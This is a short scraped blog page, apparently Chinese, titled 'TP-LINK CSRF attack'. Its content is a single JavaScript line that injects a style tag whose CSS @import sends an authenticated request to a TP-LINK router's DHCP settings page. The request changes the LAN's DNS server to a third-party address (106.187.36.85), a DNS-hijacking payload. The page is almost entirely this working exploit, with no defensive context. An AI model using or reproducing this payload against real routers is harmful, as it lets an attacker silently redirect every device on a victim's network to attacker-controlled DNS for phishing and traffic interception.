1. 程式人生 > >TP-LINK的CSRF攻擊

TP-LINK的CSRF攻擊

dns eas sse lin type protected spa lan .cn

寫了一個style標簽import一個css調用:
document.writeln(‘<style type="text/css">@import url(http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>‘)

TP-LINK的CSRF攻擊